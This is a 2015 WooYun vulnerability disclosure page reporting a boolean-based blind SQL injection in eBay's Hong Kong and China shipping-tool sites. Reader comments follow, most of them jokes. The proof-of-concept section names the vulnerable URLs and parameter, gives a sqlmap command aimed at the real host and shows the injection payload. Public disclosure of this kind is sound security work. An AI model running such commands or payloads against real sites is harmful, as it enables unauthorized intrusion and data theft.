当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149285

漏洞标题:eBay Website Boolean-based Blind SQL Injection Vulnerabilities

相关厂商:eBay Inc.

漏洞作者: 猪猪侠

提交时间:2015-10-25 11:25

修复时间:2015-10-30 11:26

公开时间:2015-10-30 11:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-25: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Boolean-based Blind SQL Injection in Hongkong & China Website;

详细说明:

#1 DESCRIPTION
eBay Shipping Tool
#2 VULNERABILITY

http://shippingtool.ebay.com.hk/Help/HelpDetail.html?typeid=e6d68975d8&type1id=0b9533376c&id=28b1eefbf4
http://shippingtool.ebay.cn/Help/HelpDetail.html?typeid=e6d68975d8&type1id=0b9533376c&id=28b1eefbf4

漏洞证明:

#3 PROOF OF CONCEPT

python sqlmap.py -u "http://shippingtool.ebay.cn/Help/HelpDetail.html?typeid=e6d68975d8&type1id=0b9533376c&id=28b1eefbf4"


[11:14:59] [INFO] testing connection to the target URL
[11:15:00] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:15:01] [WARNING] reflective value(s) found and filtering out
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: typeid=e6d68975d8&type1id=0b9533376c&id=28b1eefbf4' AND 6916=6916 AND 'YDaD'='YDaD

修复方案:

# before making any kind of request with them must be validated.

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-30 11:26

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-25 11:29 | loopx9 ( 核心白帽子 | Rank:672 漏洞数:65 | ..)

    沙发

  2. 2015-10-25 11:31 | loopx9 ( 核心白帽子 | Rank:672 漏洞数:65 | ..)

    Vulnerabilities 少个s...

  3. 2015-10-25 11:35 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2814 漏洞数:562 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    ~~~~

  4. 2015-10-25 11:35 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    牛逼!

  5. 2015-10-25 11:41 | Msyb ( 实习白帽子 | Rank:40 漏洞数:10 | 非常荣幸加入乌云。)

    前排

  6. 2015-10-25 11:53 | Submit ( 普通白帽子 | Rank:436 漏洞数:95 | 就是一屌丝)

    还好哥懂点English

  7. 2015-10-25 11:56 | 梨花带雨 ( 普通白帽子 | Rank:159 漏洞数:55 | 去年今日此门中,人面桃花相映红。人面不...)

    占座

  8. 2015-10-25 12:01 | MAX丶 ( 路人 | Rank:20 漏洞数:5 | 人生路上总有一些不顺心的事情,让我们跳过...)

    高逼格】

  9. 2015-10-25 12:05 | DNS ( 普通白帽子 | Rank:329 漏洞数:41 | 杀猪刀啊,杀猪刀啊)

    epay 支付啊

  10. 2015-10-25 12:06 | 鬼见愁 ( 路人 | Rank:10 漏洞数:1 | 挖洞之神)

    猪猪侠 我以为你是 美国人

  11. 2015-10-25 12:13 | 娃哈哈 ( 实习白帽子 | Rank:39 漏洞数:6 | 伟大的科学家)

    我以为我在墙外

  12. 2015-10-25 12:42 | Rand0m ( 路人 | Rank:8 漏洞数:4 | 真的有一米八五。。)

    吓得我打开了百度翻译

  13. 2015-10-25 13:04 | 小杨 ( 路人 | Rank:22 漏洞数:4 | 。)

    I'm shocked!!!!But I think the eBay China know Chinese.

  14. 2015-10-25 13:15 | 随风的风 ( 普通白帽子 | Rank:131 漏洞数:48 | [code]时光如水,总是无言,你若安好,便是...)

    吓得我打开了百度翻译

  15. 2015-10-25 13:16 | 心云 ( 路人 | Rank:29 漏洞数:16 | 遇见)

    @DNS 是eBay 不是ePay.........

  16. 2015-10-25 13:30 | DNS ( 普通白帽子 | Rank:329 漏洞数:41 | 杀猪刀啊,杀猪刀啊)

    @心云 没注意

  17. 2015-10-25 14:30 | hecate ( 普通白帽子 | Rank:379 漏洞数:63 | ®高级安全工程师 | WooYun认证√)

    Well done

  18. 2015-10-25 16:10 | 小不点 ( 核心白帽子 | Rank:849 漏洞数:90 | 生命不息,刷洞不止.....)

    咦,这都写的啥

  19. 2015-10-25 16:17 | Code Life ( 路人 | Rank:16 漏洞数:5 | Code Life,Jion It!)

    亮了

  20. 2015-10-25 16:30 | 草丛基佬 ( 路人 | Rank:1 漏洞数:1 | 哟哟哟哟哟哟)

    还好我有有道词典

  21. 2015-10-25 17:35 | Azazel ( 路人 | Rank:22 漏洞数:4 | 长路漫漫.....)

    我越来越看不懂你

  22. 2015-10-25 19:05 | chock ( 实习白帽子 | Rank:58 漏洞数:15 | 今夜我们都是wooyun人,我们一定要收购长亭)

    hey,pig pig hero,your JJ was burn

  23. 2015-10-25 20:04 | 泪雨无魂 ( 普通白帽子 | Rank:147 漏洞数:45 )

    6666 。。。高逼格

  24. 2015-10-25 20:23 | 第四维度 ( 实习白帽子 | Rank:65 漏洞数:39 | 唯有梦想与好姑娘不可辜负)

    mark

  25. 2015-10-25 21:04 | 冷白开。 ( 普通白帽子 | Rank:160 漏洞数:66 | QQ:970060225 拒绝黑产,欢迎大牛交流技术...)

    吓得我打开了百度翻译

  26. 2015-10-25 21:48 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

    Niubility!

  27. 2015-10-25 21:49 | xss.whale ( 路人 | Rank:0 漏洞数:1 | 默默的看着大家牛逼。。。。)

    海淘多了,连老外斗不放过。

  28. 2015-10-26 09:17 | xy小雨 ( 普通白帽子 | Rank:171 漏洞数:50 | 成为海贼王的男人)

    nb

  29. 2015-10-26 16:24 | 六六 ( 路人 | Rank:0 漏洞数:1 | 心有猛虎,细嗅蔷薇。)

    猪猪侠到底多大了。。

  30. 2015-10-27 10:05 | eBay Inc.(乌云厂商)

    您好,非常感谢猪猪侠提供的漏洞报告!我们公司bug bounty部门正在审核漏洞中,我们会尽快回复。